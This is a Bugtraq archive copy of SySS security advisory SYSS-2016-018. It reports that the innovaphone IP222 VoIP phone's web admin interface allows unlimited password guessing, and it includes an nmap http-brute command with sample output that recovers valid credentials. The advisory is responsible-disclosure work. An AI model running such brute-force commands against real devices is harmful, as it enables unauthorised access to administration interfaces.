lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201603240845.u2O8jiYq003889@sf01web1.securityfocus.com>
Date: Thu, 24 Mar 2016 08:45:44 GMT
From: sven.freund@...s.de
To: bugtraq@...urityfocus.com
Subject: [SYSS-2016-018] innovaphone IP222 - Improper Restriction of
 Excessive Authentication Attempts

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-018
Product: innovaphone IP222
Manufacturer: innovaphone AG
Affected Version(s): 11r2 sr9
Tested Version(s): 11r2 sr9
Vulnerability Type: Improper Restriction of Excessive Authentication 
                    Attempts (CWE-307)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2016-03-04
Solution Date: Unknown
Public Disclosure: 2016-03-24
CVE Reference: Not yet assigned
Author of Advisory: Sven Freund (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The innovaphone IP222 is a Voice over IP telephone solution, which
provides many communication functionalities, for instance, announcement
function, password protected administration via web browser (HTTPS),
multiple registration up to six users at the same time and many other
features.

The manufacturer innovaphone AG describes the product as follows
(see [1]):

"The IP222 telephone unites a very modern design with groundbreaking
technological details. It belongs to the innovaphone product family that
won the popular 'red dot award: product design'."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The innovaphone IP222 provides a password protected administration
interface, which can be accessed via a web browser. Although the basic
authentication was disabled and instead the digest authentication is
used, it is still possible to perform brute-force attacks against the
password authentication process.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The innovaphone IP222 provides a password protected administration
interface, which could be accessed via a web browser, but possesses no
countermeasures against brute-force attacks. Therefore, it is possible
to perform brute-force attacks with common tools like Nmap or Hydra:

nmap -p80 --min-rate=200 --script http-brute --script-args http-brute.
path="CMD0/mod_cmd.xml" 192.168.5.23 -d

(...)

Overall sending rates: 1042.75 packets / s.
NSE: Script scanning 192.168.5.23.
NSE: Starting runlevel 1 (of 1) scan.
NSE: Starting http-brute against 192.168.5.23:80.
Initiating NSE at 16:24
NSE: Discovered account: test:test - Valid credentials

Due to the current configuration settings, the sending rate for a web
based brute-force attack is almost 1042.75 packets per second. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution: 

According to information by the innovaphone AG, the described security
issue has been addressed by the following workaround:

http://wiki.innovaphone.com/index.php?title=Course12:Advanced_-_Reverse_Proxy#No-Nos

Please contact the manufacturer for further information or support.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-03-04: Vulnerability reported to manufacturer
2016-03-09: Manufacturer acknowledges e-mail with SySS security advisory
            and described the security issue as fixed
2016-03-24: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Web Site for innovaphone IP222
    https://www.innovaphone.com/en/ip-telefonie/ip-telefone/ip222.html
[2] SySS Security Advisory SYSS-2016-018
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-018.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sven Freund of the SySS GmbH.

E-Mail: sven.freund (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sven_Freund.asc
Key fingerprint = DCDB 7627 C1E3 9CE8 62DF 2666 8A5F A853 415D 46DC

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCgAGBQJW86aoAAoJEIpfqFNBXUbcuDAH+wXRZ+mazbOMzHzA/jBeYh/I
mdEFToeqRzPiY9bRNBDuo0TpMjQ/YCIIhK3G8nJdysGAIYlaVIGnuEwB63fQ8D8y
FHSH1bopEAtEgWEGNBP7sGWpF4RvVfHV+YyKBGNAehs1L1UuNreaoIYlzKVKpaQP
oHsDFEatR6jfhsZtkQ3dz7WjAyUrWRl6RCX9m2aK5mijtbOcWBoVKqMX0j7t/uxk
mgKhoELjmosQGMjLzPNBiCEdVzMGZbtX5/D+aQ7ectkoiCRg3cwg/99z1loPYTrn
IcWNCGNI3natcUuKihbILpLtRq6FyCLzybVm2mRiHHtS6C6sfkWsRJlYTd/QOew=
=wgkw
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ